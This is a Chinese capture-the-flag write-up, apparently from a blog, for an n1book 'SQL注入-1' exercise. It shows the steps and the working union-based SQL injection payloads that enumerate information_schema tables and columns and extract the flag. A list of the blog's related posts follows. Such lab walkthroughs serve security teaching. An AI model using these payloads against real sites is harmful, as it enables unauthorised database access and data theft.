[第一章 web入门]SQL注入-1

[第一章 web入门]SQL注入-1

  • 使用1’ and 1=2 --+测试出闭合符为 ’
  • 使用1’ order by 3 --+,得出字段数为3
    image.png
    payload
id=-1'union select 1,(select(group_concat(table_name))from(infoRmation_schema.tables)where(table_schema)like(database())),3 --+
  • 得出fl4g,notes
id=-1'union select 1,(select(group_concat(column_name))from(infoRmation_schema.columns)where(table_schema)like(database())AND(table_name)like('fl4g')),3 --+
  • fllllag
id=-1'union select 1,(select(group_concat(fllllag))from(fl4g)),3 --+
  • n1book{union_select_is_so_cool}

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-31 11:54:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-31 11:54:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-03-31 11:54:02       82 阅读
  4. Python语言-面向对象

    2024-03-31 11:54:02       91 阅读

热门阅读

  1. TYPORA笔记

    2024-03-31 11:54:02       43 阅读
  2. Concul 配置中心 微服务的配置

    2024-03-31 11:54:02       37 阅读
  3. python 报错问题汇总

    2024-03-31 11:54:02       39 阅读
  4. K8S 运维管理

    2024-03-31 11:54:02       39 阅读
  5. 基于UDP的可靠传输协议QUIC协议

    2024-03-31 11:54:02       40 阅读
  6. AtCoder_ABC130_Rectangle Cutting

    2024-03-31 11:54:02       33 阅读
  7. 什么是计算机视觉?计算机视觉:从基础到前沿

    2024-03-31 11:54:02       35 阅读
  8. 算法与数据结构 顺序表

    2024-03-31 11:54:02       41 阅读